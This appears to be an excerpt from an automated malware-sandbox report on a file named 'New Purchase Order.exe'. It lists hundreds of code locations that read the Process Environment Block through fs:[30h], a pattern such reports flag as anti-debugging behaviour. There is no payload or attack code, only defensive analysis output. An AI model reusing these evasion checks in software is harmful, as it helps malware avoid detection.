            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E53E mov eax, dword ptr fs:[00000030h]8_2_0115E53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E53E mov eax, dword ptr fs:[00000030h]8_2_0115E53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E53E mov eax, dword ptr fs:[00000030h]8_2_0115E53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E53E mov eax, dword ptr fs:[00000030h]8_2_0115E53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E53E mov eax, dword ptr fs:[00000030h]8_2_0115E53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01138550 mov eax, dword ptr fs:[00000030h]8_2_01138550
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01138550 mov eax, dword ptr fs:[00000030h]8_2_01138550
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116656A mov eax, dword ptr fs:[00000030h]8_2_0116656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116656A mov eax, dword ptr fs:[00000030h]8_2_0116656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116656A mov eax, dword ptr fs:[00000030h]8_2_0116656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E59C mov eax, dword ptr fs:[00000030h]8_2_0116E59C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01132582 mov eax, dword ptr fs:[00000030h]8_2_01132582
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01132582 mov ecx, dword ptr fs:[00000030h]8_2_01132582
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01164588 mov eax, dword ptr fs:[00000030h]8_2_01164588
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011545B1 mov eax, dword ptr fs:[00000030h]8_2_011545B1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011545B1 mov eax, dword ptr fs:[00000030h]8_2_011545B1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B05A7 mov eax, dword ptr fs:[00000030h]8_2_011B05A7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B05A7 mov eax, dword ptr fs:[00000030h]8_2_011B05A7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B05A7 mov eax, dword ptr fs:[00000030h]8_2_011B05A7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011365D0 mov eax, dword ptr fs:[00000030h]8_2_011365D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A5D0 mov eax, dword ptr fs:[00000030h]8_2_0116A5D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A5D0 mov eax, dword ptr fs:[00000030h]8_2_0116A5D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E5CF mov eax, dword ptr fs:[00000030h]8_2_0116E5CF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E5CF mov eax, dword ptr fs:[00000030h]8_2_0116E5CF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011325E0 mov eax, dword ptr fs:[00000030h]8_2_011325E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116C5ED mov eax, dword ptr fs:[00000030h]8_2_0116C5ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116C5ED mov eax, dword ptr fs:[00000030h]8_2_0116C5ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01168402 mov eax, dword ptr fs:[00000030h]8_2_01168402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01168402 mov eax, dword ptr fs:[00000030h]8_2_01168402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01168402 mov eax, dword ptr fs:[00000030h]8_2_01168402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E420 mov eax, dword ptr fs:[00000030h]8_2_0112E420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E420 mov eax, dword ptr fs:[00000030h]8_2_0112E420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E420 mov eax, dword ptr fs:[00000030h]8_2_0112E420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112C427 mov eax, dword ptr fs:[00000030h]8_2_0112C427
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011EA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0112645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0115245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0115A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0115A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0115A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011EA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01130710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01160710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01130750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BE75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011B4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01138770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011D678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011E47A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011B07C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0114E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01166620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01168620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0114C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01162674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01134690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01134690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011666B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011B06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011B06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01128918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01128918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01204940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01156962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01156962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01156962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0117096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0117096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0117096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01152835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01152835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01152835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01152835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01152835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01152835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01160854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01134859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01134859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01142840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01130887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0115E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_012008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011FA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01204B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0115EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0115EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01128B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011C6B40 mov eax, dword ptr fs:[00000030h]
